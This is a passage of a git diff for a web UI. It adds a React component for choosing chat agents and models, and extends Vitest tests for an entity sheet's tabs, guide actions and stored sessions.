+    expect(menu).toHaveClass('bottom-full');
+    expect(menu).not.toHaveClass('left-0');
+  });
+});
diff --git a/webui/src/components/common/ChatPromptSelectors.tsx b/webui/src/components/common/ChatPromptSelectors.tsx
new file mode 100644
index 000000000..bcf576204
--- /dev/null
+++ b/webui/src/components/common/ChatPromptSelectors.tsx
@@ -0,0 +1,543 @@
+import { useCallback, useEffect, useMemo, useState } from 'react';
+import { Bot, ChevronDown, Cpu, Info } from 'lucide-react';
+import { useTranslation } from 'react-i18next';
+
+import type { Agent } from '@/api/agent';
+import { defaultModelAPI, modelV2API } from '@/api/provider';
+import { useAgents } from '@/hooks/useAgents';
+import { useProviders } from '@/hooks/useProviders';
+import { getAgentDisplayDescription, getAgentDisplayName, isAgentUsableInChat } from '@/utils/agentDisplay';
+import type { ModelDefinitionV2 } from '@/types';
+
+export type AgentSourceFilter = 'all' | 'builtin' | 'custom';
+
+export type ChatModelOption = {
+  key: string;
+  providerID: string;
+  providerName: string;
+  modelID: string;
+  label: string;
+  pricingLabel: string;
+  contextLabel: string;
+  contextWindowTokens: number | null;
+  supportsVision: boolean | null;
+};
+
+export type ChatModelProviderGroup = {
+  providerID: string;
+  providerName: string;
+  models: ChatModelOption[];
+};
+
+type SelectorTooltip = {
+  title: string;
+  lines: string[];
+  x: number;
+  y: number;
+};
+
+function formatAgentName(name: string): string {
+  return name ? name.charAt(0).toUpperCase() + name.slice(1) : name;
+}
+
+export function useChatAgentOptions(options: { allowedAgentNames?: string[] } = {}) {
+  const { agents, loading } = useAgents();
+  const allowedNames = useMemo(() => (
+    options.allowedAgentNames ? new Set(options.allowedAgentNames) : null
+  ), [options.allowedAgentNames]);
+
+  const primaryAgents = useMemo(
+    () => agents.filter((agent) => agent.mode === 'primary' && isAgentUsableInChat(agent)),
+    [agents],
+  );
+  const subAgents = useMemo(
+    () => agents.filter((agent) => agent.mode !== 'primary' && isAgentUsableInChat(agent)),
+    [agents],
+  );
+  const chatAgents = useMemo(
+    () => [...primaryAgents, ...subAgents].filter((agent) => !allowedNames || allowedNames.has(agent.name)),
+    [allowedNames, primaryAgents, subAgents],
+  );
+
+  return {
+    agents: chatAgents,
+    loading,
+  };
+}
+
+export function useChatModelOptions() {
+  const { t } = useTranslation('session');
+  const { providers, loading: loadingProviders } = useProviders();
+  const [enabledModelDefinitions, setEnabledModelDefinitions] = useState<ModelDefinitionV2[]>([]);
+  const [loadingEnabledModels, setLoadingEnabledModels] = useState(true);
+  const [selectedModelKey, setSelectedModelKey] = useState<string | null>(null);
+
+  useEffect(() => {
+    let cancelled = false;
+    setLoadingEnabledModels(true);
+    Promise.resolve(modelV2API.listDefinitions({ enabled_only: true }))
+      .then((response) => {
+        if (!cancelled) setEnabledModelDefinitions(response?.data?.models ?? []);
+      })
+      .catch(() => {
+        if (!cancelled) setEnabledModelDefinitions([]);
+      })
+      .finally(() => {
+        if (!cancelled) setLoadingEnabledModels(false);
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, []);
+
+  const options = useMemo<ChatModelOption[]>(() => {
+    const providerById = new Map(
+      providers
+        .filter((provider) => provider.configured)
+        .map((provider) => [provider.id, provider]),
+    );
+
+    const formatPricing = (pricing: ModelDefinitionV2['pricing']): string => {
+      if (!pricing) return t('modelPicker.noCost');
+      if (pricing.input === 0 && pricing.output === 0) return t('modelPicker.free');
+      const currencySymbol = pricing.currency === 'CNY' ? '¥' : '$';
+      return `${currencySymbol}${pricing.input}/${currencySymbol}${pricing.output}/M`;
+    };
+
+    const formatContextWindow = (contextWindow?: number): string => {
+      if (!contextWindow) return t('modelPicker.contextUnknown');
+      const value = contextWindow >= 1000000
+        ? `${(contextWindow / 1000000).toFixed(0)}M`
+        : `${(contextWindow / 1000).toFixed(0)}K`;
+      return t('modelPicker.contextWindow', { value });
+    };
+
+    return enabledModelDefinitions.flatMap((model) => {
+      const provider = providerById.get(model.provider_id);
+      if (!provider) return [];
+      return [{
+        key: `${provider.id}::${model.id}`,
+        providerID: provider.id,
+        providerName: provider.name || provider.id,
+        modelID: model.id,
+        label: model.name || model.id,
+        pricingLabel: formatPricing(model.pricing),
+        contextLabel: formatContextWindow(model.limits?.context_window),
+        contextWindowTokens: model.limits?.context_window ?? null,
+        supportsVision: typeof model.capabilities?.supports_vision === 'boolean'
+          ? model.capabilities.supports_vision
+          : null,
+      }];
+    });
+  }, [enabledModelDefinitions, providers, t]);
+
+  const groupedOptions = useMemo<ChatModelProviderGroup[]>(() => {
+    const groups = new Map<string, ChatModelProviderGroup>();
+
+    providers.forEach((provider) => {
+      if (!provider.configured) return;
+      groups.set(provider.id, {
+        providerID: provider.id,
+        providerName: provider.name || provider.id,
+        models: [],
+      });
+    });
+
+    options.forEach((option) => {
+      const group = groups.get(option.providerID);
+      if (group) group.models.push(option);
+    });
+
+    return Array.from(groups.values())
+      .map((group) => ({
+        ...group,
+        models: [...group.models].sort((a, b) => a.label.localeCompare(b.label)),
+      }))
+      .filter((group) => group.models.length > 0)
+      .sort((a, b) => a.providerName.localeCompare(b.providerName));
+  }, [options, providers]);
+
+  const selectedModelOption = useMemo(
+    () => options.find((option) => option.key === selectedModelKey) ?? options[0] ?? null,
+    [options, selectedModelKey],
+  );
+
+  useEffect(() => {
+    if (selectedModelKey || options.length === 0) return;
+    let cancelled = false;
+    Promise.resolve(defaultModelAPI.getResolved())
+      .then((response) => {
+        if (cancelled) return;
+        const { provider_id: providerID, model_id: modelID } = response?.data ?? {};
+        const defaultKey = `${providerID}::${modelID}`;
+        const fallbackKey = options[0]?.key ?? null;
+        setSelectedModelKey(options.some((option) => option.key === defaultKey) ? defaultKey : fallbackKey);
+      })
+      .catch(() => {
+        if (!cancelled) setSelectedModelKey(options[0]?.key ?? null);
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, [options, selectedModelKey]);
+
+  useEffect(() => {
+    if (loadingEnabledModels || options.length === 0 || !selectedModelKey) return;
+    if (options.some((option) => option.key === selectedModelKey)) return;
+    setSelectedModelKey(options[0].key);
+  }, [loadingEnabledModels, options, selectedModelKey]);
+
+  return {
+    groupedOptions,
+    loading: loadingProviders || loadingEnabledModels,
+    options,
+    selectedModelKey,
+    selectedModelOption,
+    selectedPromptModel: selectedModelOption
+      ? { providerID: selectedModelOption.providerID, modelID: selectedModelOption.modelID }
+      : null,
+    setSelectedModelKey,
+  };
+}
+
+function useSelectorTooltip() {
+  const [tooltip, setTooltip] = useState<SelectorTooltip | null>(null);
+  const showTooltip = useCallback((target: HTMLElement, title: string, lines: string[]) => {
+    const rect = target.getBoundingClientRect();
+    setTooltip({
+      title,
+      lines,
+      x: rect.left - 8,
+      y: rect.top + rect.height / 2,
+    });
+  }, []);
+  const hideTooltip = useCallback(() => setTooltip(null), []);
+
+  return {
+    tooltip,
+    showTooltip,
+    hideTooltip,
+  };
+}
+
+function SelectorTooltipOverlay({ tooltip }: { tooltip: SelectorTooltip | null }) {
+  if (!tooltip) return null;
+  return (
+    <div
+      className="pointer-events-none fixed z-[80] w-56 -translate-x-full -translate-y-1/2 rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-700 shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:shadow-xl dark:shadow-black/30"
+      style={{ left: tooltip.x, top: tooltip.y }}
+    >
+      <div className="mb-0.5 font-semibold text-zinc-800 dark:text-zinc-100">{tooltip.title}</div>
+      {tooltip.lines.map((line, index) => (
+        <div key={`${tooltip.title}-${index}`} className={index === 0 ? '' : 'mt-1 break-all text-zinc-500 dark:text-zinc-400'}>
+          {line}
+        </div>
+      ))}
+      <div className="absolute left-full top-1/2 -translate-y-1/2 border-4 border-transparent border-l-zinc-200 dark:border-l-zinc-800" />
+    </div>
+  );
+}
+
+export function ChatAgentDisplay({
+  agents,
+  selectedAgent,
+}: {
+  agents: Agent[];
+  selectedAgent: string;
+}) {
+  const { t, i18n } = useTranslation('session');
+  const selectedAgentInfo = useMemo(
+    () => agents.find((agent) => agent.name === selectedAgent),
+    [agents, selectedAgent],
+  );
+
+  return (
+    <div
+      className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 dark:text-zinc-300"
+      title={t('agentPicker.title')}
+    >
+      <Bot className="h-3 w-3 shrink-0" />
+      <span className="truncate font-medium">
+        {selectedAgentInfo ? getAgentDisplayName(selectedAgentInfo, i18n.language) : formatAgentName(selectedAgent)}
+      </span>
+    </div>
+  );
+}
+
+export function ChatAgentPicker({
+  agents,
+  loading,
+  selectedAgent,
+  onSelectAgent,
+  showSourceFilter = true,
+}: {
+  agents: Agent[];
+  loading: boolean;
+  selectedAgent: string;
+  onSelectAgent: (agentName: string) => void;
+  showSourceFilter?: boolean;
+}) {
+  const { t, i18n } = useTranslation('session');
+  const [open, setOpen] = useState(false);
+  const [sourceFilter, setSourceFilter] = useState<AgentSourceFilter>('all');
+  const { tooltip, showTooltip, hideTooltip } = useSelectorTooltip();
+
+  const filteredAgents = useMemo(
+    () => agents.filter((agent) => {
+      if (!showSourceFilter) return true;
+      if (sourceFilter === 'builtin') return agent.native;
+      if (sourceFilter === 'custom') return !agent.native;
+      return true;
+    }),
+    [agents, showSourceFilter, sourceFilter],
+  );
+  const selectedAgentInfo = useMemo(
+    () => agents.find((agent) => agent.name === selectedAgent),
+    [agents, selectedAgent],
+  );
+
+  useEffect(() => {
+    if (!open) return;
+    const handle = (event: MouseEvent) => {
+      const target = event.target as HTMLElement;
+      if (!target.closest('[data-agent-selector]')) setOpen(false);
+    };
+    document.addEventListener('mousedown', handle);
+    return () => document.removeEventListener('mousedown', handle);
+  }, [open]);
+
+  useEffect(() => {
+    if (!open) hideTooltip();
+  }, [hideTooltip, open]);
+
+  return (
+    <div className="relative" data-agent-selector>
+      <button
+        type="button"
+        onClick={() => setOpen((value) => !value)}
+        className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50"
+        title={t('agentPicker.title')}
+      >
+        <Bot className="h-3 w-3 shrink-0" />
+        <span className="truncate font-medium">
+          {selectedAgentInfo ? getAgentDisplayName(selectedAgentInfo, i18n.language) : formatAgentName(selectedAgent)}
+        </span>
+        <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${open ? 'rotate-180' : ''}`} />
+      </button>
+      {open && (
+        <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+          <div className="flex items-center justify-between gap-2 border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+            <div className="min-w-0">
+              <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('agentPicker.title')}</div>
+              <div
+                className="truncate text-[10px] text-zinc-400 dark:text-zinc-500"
+                onPointerEnter={(event) => showTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
+                onMouseEnter={(event) => showTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
+                onMouseOver={(event) => showTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
+                onMouseLeave={hideTooltip}
+                onPointerLeave={hideTooltip}
+              >
+                {t('agentPicker.hint')}
+              </div>
+            </div>
+            {showSourceFilter && (
+              <div className="inline-flex shrink-0 items-center rounded-md border border-zinc-200 bg-white p-0.5 text-[10px] dark:border-zinc-800 dark:bg-zinc-950">
+                {(['all', 'builtin', 'custom'] as AgentSourceFilter[]).map((filter) => (
+                  <button
+                    key={filter}
+                    type="button"
+                    onClick={() => setSourceFilter(filter)}
+                    className={`rounded px-1.5 py-0.5 transition-colors ${
+                      sourceFilter === filter
+                        ? 'bg-zinc-100 text-zinc-900 dark:bg-zinc-800 dark:text-zinc-50'
+                        : 'text-zinc-500 hover:bg-zinc-50 hover:text-zinc-800 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100'
+                    }`}
+                  >
+                    {t(`agentPicker.filter.${filter}`)}
+                  </button>
+                ))}
+              </div>
+            )}
+          </div>
+          <div className="h-64 space-y-0.5 overflow-y-auto p-1.5">
+            {loading ? (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('loading')}</div>
+            ) : filteredAgents.length > 0 ? (
+              filteredAgents.map((agent) => {
+                const displayName = getAgentDisplayName(agent, i18n.language);
+                const primaryDesc = getAgentDisplayDescription(agent, i18n.language) || t('smartAssistant');
+                return (
+                  <button
+                    key={agent.name}
+                    onClick={() => { onSelectAgent(agent.name); setOpen(false); }}
+                    className={`w-full min-w-0 rounded-md px-2 py-1.5 text-left transition-colors ${
+                      selectedAgent === agent.name
+                        ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                        : 'hover:bg-zinc-50 text-zinc-700 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
+                    }`}
+                  >
+                    <div className="flex min-w-0 items-center gap-2">
+                      <Bot className={`h-3 w-3 shrink-0 ${selectedAgent === agent.name ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                      <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">
+                        {displayName}
+                      </span>
+                      <span className={`shrink-0 rounded px-1.5 py-0.5 text-[9px] font-medium ${
+                        agent.mode === 'primary'
+                          ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
+                          : agent.native
+                            ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
+                            : 'bg-teal-50 text-teal-600 dark:bg-teal-950/40 dark:text-teal-200'
+                      }`}>
+                        {agent.mode === 'primary'
+                          ? t('agentPicker.badge.primary')
+                          : agent.native
+                            ? t('agentPicker.badge.builtin')
+                            : t('agentPicker.badge.custom')}
+                      </span>
+                      <div className="ml-auto flex shrink-0 items-center gap-1">
+                        {primaryDesc && (
+                          <span
+                            className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
+                            onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                            onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                            onPointerEnter={(event) => showTooltip(event.currentTarget, displayName, [primaryDesc])}
+                            onMouseEnter={(event) => showTooltip(event.currentTarget, displayName, [primaryDesc])}
+                            onMouseOver={(event) => showTooltip(event.currentTarget, displayName, [primaryDesc])}
+                            onMouseLeave={hideTooltip}
+                            onPointerLeave={hideTooltip}
+                          >
+                            <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
+                          </span>
+                        )}
+                      </div>
+                    </div>
+                  </button>
+                );
+              })
+            ) : (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('noAgents')}</div>
+            )}
+          </div>
+        </div>
+      )}
+      <SelectorTooltipOverlay tooltip={tooltip} />
+    </div>
+  );
+}
+
+export function ChatModelPicker({
+  groupedOptions,
+  loading,
+  selectedModelOption,
+  onSelectModel,
+}: {
+  groupedOptions: ChatModelProviderGroup[];
+  loading: boolean;
+  selectedModelOption: ChatModelOption | null;
+  onSelectModel: (option: ChatModelOption) => void;
+}) {
+  const { t } = useTranslation('session');
+  const [open, setOpen] = useState(false);
+  const { tooltip, showTooltip, hideTooltip } = useSelectorTooltip();
+  const hasOptions = groupedOptions.some((group) => group.models.length > 0);
+
+  useEffect(() => {
+    if (!open) return;
+    const handle = (event: MouseEvent) => {
+      const target = event.target as HTMLElement;
+      if (!target.closest('[data-model-selector]')) setOpen(false);
+    };
+    document.addEventListener('mousedown', handle);
+    return () => document.removeEventListener('mousedown', handle);
+  }, [open]);
+
+  useEffect(() => {
+    if (!open) hideTooltip();
+  }, [hideTooltip, open]);
+
+  return (
+    <div className="relative" data-model-selector>
+      <button
+        type="button"
+        onClick={() => setOpen((value) => !value)}
+        disabled={loading || !hasOptions}
+        className="flex h-7 w-[132px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50"
+        title={selectedModelOption ? `${selectedModelOption.providerName} / ${selectedModelOption.modelID}` : t('modelPicker.empty')}
+      >
+        <Cpu className="h-3 w-3 shrink-0" />
+        <span className="truncate font-medium">
+          {selectedModelOption?.label ?? (loading ? t('loading') : t('modelPicker.empty'))}
+        </span>
+        <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${open ? 'rotate-180' : ''}`} />
+      </button>
+      {open && (
+        <div className="absolute right-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+          <div className="border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+            <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('modelPicker.title')}</div>
+            <div className="truncate text-[10px] text-zinc-400 dark:text-zinc-500">{t('modelPicker.hint')}</div>
+          </div>
+          <div className="h-[13.5rem] overflow-y-auto p-1.5">
+            {loading ? (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('loading')}</div>
+            ) : groupedOptions.length > 0 ? (
+              groupedOptions.map((group) => (
+                <div key={group.providerID} className="py-1 first:pt-0 last:pb-0">
+                  <div className="sticky top-0 z-10 flex items-center justify-between gap-2 bg-white/95 px-1.5 py-1 text-[10px] font-semibold text-zinc-500 backdrop-blur dark:bg-zinc-900/95 dark:text-zinc-400">
+                    <span className="truncate">{group.providerName}</span>
+                    <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[9px] text-zinc-500 dark:bg-zinc-800 dark:text-zinc-300">
+                      {t('modelPicker.count', { count: group.models.length })}
+                    </span>
+                  </div>
+                  <div className="space-y-0.5">
+                    {group.models.map((option) => (
+                      <button
+                        key={option.key}
+                        type="button"
+                        onClick={() => {
+                          onSelectModel(option);
+                          setOpen(false);
+                        }}
+                        className={`w-full rounded-md px-2 py-1.5 text-left transition-colors ${
+                          selectedModelOption?.key === option.key
+                            ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                            : 'text-zinc-700 hover:bg-zinc-50 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
+                        }`}
+                      >
+                        <div className="flex min-w-0 items-center gap-2">
+                          <Cpu className={`h-3 w-3 shrink-0 ${selectedModelOption?.key === option.key ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                          <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">{option.label}</span>
+                          {option.supportsVision === true && (
+                            <span className="shrink-0 rounded bg-zinc-100 px-1.5 py-0.5 text-[9px] font-medium text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300">
+                              {t('modelPicker.vision')}
+                            </span>
+                          )}
+                          <div className="ml-auto flex shrink-0 items-center gap-1">
+                            <span
+                              className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
+                              onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                              onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
+                              onPointerEnter={(event) => showTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
+                              onMouseEnter={(event) => showTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
+                              onMouseOver={(event) => showTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
+                              onMouseLeave={hideTooltip}
+                              onPointerLeave={hideTooltip}
+                            >
+                              <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
+                            </span>
+                          </div>
+                        </div>
+                      </button>
+                    ))}
+                  </div>
+                </div>
+              ))
+            ) : (
+              <div className="p-3 text-center text-xs text-zinc-500">{t('modelPicker.empty')}</div>
+            )}
+          </div>
+        </div>
+      )}
+      <SelectorTooltipOverlay tooltip={tooltip} />
+    </div>
+  );
+}
diff --git a/webui/src/components/common/EntitySheet.test.tsx b/webui/src/components/common/EntitySheet.test.tsx
index e95894f17..99a8ac78f 100644
--- a/webui/src/components/common/EntitySheet.test.tsx
+++ b/webui/src/components/common/EntitySheet.test.tsx
@@ -1,23 +1,53 @@
 import { describe, it, expect, vi, beforeEach } from 'vitest';
-import { render, screen } from '@testing-library/react';
+import { render, screen, waitFor } from '@testing-library/react';
 import userEvent from '@testing-library/user-event';
+import SessionChat from '@/components/common/SessionChat';
 import EntitySheet from '@/components/common/EntitySheet';
 
+const { mockClientGet, mockClientPost, mockConversationHasMessages, mockUseSessionChat } = vi.hoisted(() => ({
+  mockClientGet: vi.fn(),
+  mockClientPost: vi.fn(),
+  mockConversationHasMessages: { current: true },
+  mockUseSessionChat: vi.fn(),
+}));
+
 // ---------------------------------------------------------------------------
 // Mocks
 // ---------------------------------------------------------------------------
 
 vi.mock('@/hooks/useSessionChat', () => ({
-  useSessionChat: vi.fn(() => ({
-    sessionId: null,
-    loading: false,
-    error: null,
-    create: vi.fn().mockResolvedValue(undefined),
-    retry: vi.fn().mockResolvedValue(undefined),
-    reset: vi.fn(),
-  })),
+  useSessionChat: mockUseSessionChat,
 }));
 
+vi.mock('@/components/common/SessionChat', async () => {
+  const React = await import('react');
+  return {
+    default: vi.fn((props: any) => {
+      const bottomSlot = typeof props.conversationBottomSlot === 'function'
+        ? props.conversationBottomSlot({
+            sendPrompt: vi.fn(),
+            setInput: vi.fn(),
+            focusInput: vi.fn(),
+            sending: false,
+            streaming: false,
+            sessionId: props.sessionId,
+            hasMessages: mockConversationHasMessages.current,
+          })
+        : props.conversationBottomSlot;
+
+      return React.createElement(
+        'div',
+        {
+          'data-testid': 'session-chat',
+          'data-display': JSON.stringify(props.display ?? null),
+        },
+        bottomSlot ? React.createElement('div', { 'data-testid': 'conversation-bottom-slot' }, bottomSlot) : null,
+      );
+    }),
+    buildInstructionDisplayText: (label: string) => `@@flocks-instruction:${label}`,
+  };
+});
+
 // Provide a t() that returns actual Chinese text so the test assertions match
 // what users see in the browser (mirror of zh-CN/common.json entity section).
 const entityTranslations: Record<string, string> = {
@@ -27,7 +57,7 @@ const entityTranslations: Record<string, string> = {
   'entity.defaultCreate': '创建',
   'entity.defaultSave': '保存',
   'entity.tabDetails': '详情',
-  'entity.tabAIEdit': 'AI 编辑',
+  'entity.tabAIEdit': '工作台',
   'entity.tabTest': '测试',
   'entity.rexThinking': 'Agent 正在思考中...',
   'entity.editAndSend': '编辑下方内容，发送给 Agent 查看效果',
@@ -41,6 +71,7 @@ const entityTranslations: Record<string, string> = {
   'entity.cancelButton': '取消',
   'entity.extracting': '提取中...',
   'entity.extractFromRex': '从 Rex 提取配置',
+  'entity.extractFromRexGuideDesc': '将 Rex 输出的配置摘要提取到表单。',
   'entity.switchToForm': '切换到表单',
   'entity.testStartFailed': '测试启动失败',
   'entity.extractFailed': '提取失败，请重试',
@@ -65,12 +96,12 @@ vi.mock('react-i18next', () => ({
 
 vi.mock('@/api/client', () => ({
   default: {
-    post: vi.fn(),
-    get: vi.fn(),
+    post: mockClientPost,
+    get: mockClientGet,
     interceptors: { request: { use: vi.fn() }, response: { use: vi.fn() } },
   },
   apiClient: {
-    get: vi.fn(),
+    get: mockClientGet,
     interceptors: { request: { use: vi.fn() }, response: { use: vi.fn() } },
   },
   getApiBase: () => '',
@@ -95,6 +126,19 @@ describe('EntitySheet', () => {
 
   beforeEach(() => {
     vi.clearAllMocks();
+    window.localStorage.clear();
+    mockClientGet.mockResolvedValue({ data: {} });
+    mockClientPost.mockResolvedValue({ data: {} });
+    mockConversationHasMessages.current = true;
+    mockUseSessionChat.mockReturnValue({
+      sessionId: null,
+      loading: false,
+      error: null,
+      create: vi.fn().mockResolvedValue(undefined),
+      createAndSend: vi.fn().mockResolvedValue(undefined),
+      retry: vi.fn().mockResolvedValue(undefined),
+      reset: vi.fn(),
+    });
   });
 
   describe('Tab navigation', () => {
@@ -105,7 +149,9 @@ describe('EntitySheet', () => {
         </EntitySheet>,
       );
 
-      expect(screen.getByText('AI 编辑')).toBeInTheDocument();
+      expect(screen.getByText('工作台')).toBeInTheDocument();
+      expect(screen.getByRole('button', { name: '详情' })).toHaveClass('flex-1');
+      expect(screen.getByRole('button', { name: '工作台' })).toHaveClass('flex-1');
     });
 
     it('should default to Form tab in edit mode', () => {
@@ -131,6 +177,187 @@ describe('EntitySheet', () => {
 
       expect(screen.getByText('Form content')).toBeInTheDocument();
     });
+
+    it('defaults Rex workbench process details collapsed like workflow workbenches', () => {
+      render(
+        <EntitySheet {...defaultProps} initialTab="rex">
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      expect(screen.getByTestId('session-chat')).toHaveAttribute(
+        'data-display',
+        JSON.stringify({ collapseIntermediateSteps: true, processGroupsDefaultOpen: false }),
+      );
+      expect(vi.mocked(SessionChat)).toHaveBeenCalledWith(
+        expect.objectContaining({
+          display: {
+            collapseIntermediateSteps: true,
+            processGroupsDefaultOpen: false,
+          },
+        }),
+        undefined,
+      );
+    });
+
+    it('renders extract from Rex as a guide action instead of a standalone footer action', async () => {
+      const user = userEvent.setup();
+      const onExtractFromRex = vi.fn().mockResolvedValue(undefined);
+
+      mockUseSessionChat.mockReturnValue({
+        sessionId: 'rex-session-1',
+        loading: false,
+        error: null,
+        create: vi.fn().mockResolvedValue(undefined),
+        createAndSend: vi.fn().mockResolvedValue(undefined),
+        retry: vi.fn().mockResolvedValue(undefined),
+        reset: vi.fn(),
+      });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          onExtractFromRex={onExtractFromRex}
+          rexGuideGroups={[{
+            title: '编辑引导',
+            actions: [{
+              label: '检查模型策略',
+              description: '检查当前模型是否合适',
+              prompt: '检查模型策略',
+            }],
+          }]}
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      expect(screen.getByTestId('conversation-bottom-slot')).toBeInTheDocument();
+      expect(screen.getAllByRole('button', { name: '从 Rex 提取配置' })).toHaveLength(1);
+
+      const sessionChatProps = vi.mocked(SessionChat).mock.calls.at(-1)?.[0] as any;
+      expect(sessionChatProps.sessionId).toBe('rex-session-1');
+      expect(sessionChatProps.welcomeContent).toBeTruthy();
+      expect(sessionChatProps.welcomeContent.props.groups[0].actions.map((action: any) => action.label)).toEqual([
+        '从 Rex 提取配置',
+        '检查模型策略',
+      ]);
+
+      await user.click(screen.getByRole('button', { name: '从 Rex 提取配置' }));
+
+      await waitFor(() => {
+        expect(onExtractFromRex).toHaveBeenCalledWith('rex-session-1');
+      });
+    });
+
+    it('hides the bottom guide dock when the Rex conversation has no messages', () => {
+      mockConversationHasMessages.current = false;
+      const onExtractFromRex = vi.fn().mockResolvedValue(undefined);
+
+      mockUseSessionChat.mockReturnValue({
+        sessionId: 'rex-session-1',
+        loading: false,
+        error: null,
+        create: vi.fn().mockResolvedValue(undefined),
+        createAndSend: vi.fn().mockResolvedValue(undefined),
+        retry: vi.fn().mockResolvedValue(undefined),
+        reset: vi.fn(),
+      });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          onExtractFromRex={onExtractFromRex}
+          rexGuideGroups={[{
+            title: '编辑引导',
+            actions: [{
+              label: '检查模型策略',
+              description: '检查当前模型是否合适',
+              prompt: '检查模型策略',
+            }],
+          }]}
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      const sessionChatProps = vi.mocked(SessionChat).mock.calls.at(-1)?.[0] as any;
+      expect(sessionChatProps.sessionId).toBe('rex-session-1');
+      expect(sessionChatProps.welcomeContent).toBeTruthy();
+      expect(screen.queryByTestId('conversation-bottom-slot')).not.toBeInTheDocument();
+    });
+
+    it('resumes and stores Rex sessions when a storage key is provided', async () => {
+      window.localStorage.setItem(
+        'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        'persisted-session-1',
+      );
+      mockUseSessionChat.mockReturnValue({
+        sessionId: 'persisted-session-1',
+        loading: false,
+        error: null,
+        create: vi.fn().mockResolvedValue(undefined),
+        createAndSend: vi.fn().mockResolvedValue(undefined),
+        retry: vi.fn().mockResolvedValue(undefined),
+        reset: vi.fn(),
+      });
+
+      render(
+        <EntitySheet
+          {...defaultProps}
+          initialTab="rex"
+          rexSessionStorageKey="agent-edit:audit-agent"
+        >
+          <div>Form content</div>
+        </EntitySheet>,
+      );
+
+      await waitFor(() => {
+        expect(mockClientGet).toHaveBeenCalledWith('/api/session/persisted-session-1');
+        expect(mockUseSessionChat).toHaveBeenCalledWith(expect.objectContaining({
+          initialSessionId: 'persisted-session-1',
+        }));
+      });
+
+      await waitFor(() => {
+        expect(window.localStorage.getItem(
+          'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        )).toBe('persisted-session-1');
+      });
+    });
+
+    it('clears a stored Rex session when validation reports it missing', async () => {
+      window.localStorage.setItem(
+        'flocks:entity-sheet:rex-session:v1:agent-edit:audit-agent',
+        'missing-session-1',
+      );
